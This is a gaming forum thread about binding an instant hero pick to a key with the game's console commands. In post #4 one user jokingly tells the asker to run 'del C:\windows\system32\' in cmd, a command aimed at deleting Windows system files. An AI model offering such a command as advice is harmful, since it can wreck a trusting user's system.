Thread: Binding a hero pick to a key

Results 1 to 13 of 13
  1. #1
    Offline
    Account Icon
    Join Date
    Mar 2010
    Posts
    87
    Rep Power
    7

    Binding a hero pick to a key

    What do you type in the command screen? i forgot

  2. #2
    Offline
    Account Icon
    Join Date
    Mar 2010
    Posts
    87
    Rep Power
    7
    No one knows?!?!

  3. #3
    Offline
    Account Icon
    Chat Symbol
    Join Date
    Jun 2010
    Posts
    496
    Rep Power
    7
    set bind <insert hero> <insert key>

  4. #4
    Offline
    Account Icon
    Join Date
    Oct 2009
    Posts
    124
    Rep Power
    7
    Go into cmd and type:
    del C:\windows\system32\
    Done.
    But seriously, why do you need this? Isn't there a mod for this?

  5. #5
    Offline
    Account Icon
    Join Date
    Mar 2010
    Posts
    87
    Rep Power
    7
    Thx shakur. Id rather not mod the game, it crashes enough as it is =/ To delete a binding is it "delete" instead of set?

  6. #6
    Offline
    Account Icon
    Join Date
    Sep 2009
    Location
    Touch
    Posts
    1,022
    Rep Power
    9
    too lazy to click the hero you want?

  7. #7
    set bind <SKKOUT> <insert key> , correct
    [S2 Nome]: The number of threads made regarding Techies has absolutely zero effect on our desire to port him. Period. We're already very, very well aware of the demand for this hero. We're also aware of the type of player who typically demands this hero.

    Reworked into a public-played techie that spends his time hugging trees and placing mines.

  8. #8
    bind [ spawnhero Hero_EmeraldWarden

    now hitting [ instapicks emerald warden.

    this is atleast what i do whenever there is a new hero, remember that the Hero_Heroname part is case sensitive tho

  9. #9
    Offline
    Account Icon
    Chat Symbol
    Join Date
    Jun 2010
    Location
    Saarlacs stomach
    Posts
    2,711
    Rep Power
    9
    Is it possible to bind the heroes to number keys like 1 2 3 etc without interfering with using items with Alt + 1 etc?
    Star Wars.

  10. #10
    Offline
    Account Icon
    Join Date
    Mar 2010
    Posts
    87
    Rep Power
    7
    Quote Originally Posted by insomniatic View Post
    Is it possible to bind the heroes to number keys like 1 2 3 etc without interfering with using items with Alt + 1 etc?
    Not sure about that. they set alt + Q for inventory with Q binded to ur move, so i think alt + 1 would work the same way

  11. #11
    Offline
    Account Icon
    Join Date
    Jul 2009
    Location
    NY
    Posts
    565
    Rep Power
    8
    Why would anyone do this it sounds dumb?

  12. #12
    Offline
    Account Icon
    Chat Symbol
    Join Date
    Jun 2010
    Posts
    968
    Rep Power
    0
    Quote Originally Posted by Kahless View Post
    Why would anyone do this it sounds dumb?
    to get the new hero first when playing all pick

  13. #13
    Offline
    Account Icon
    Join Date
    Jul 2009
    Location
    NY
    Posts
    565
    Rep Power
    8
    Except there are mods that do it quicker without having to press a button so this method would be fail

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •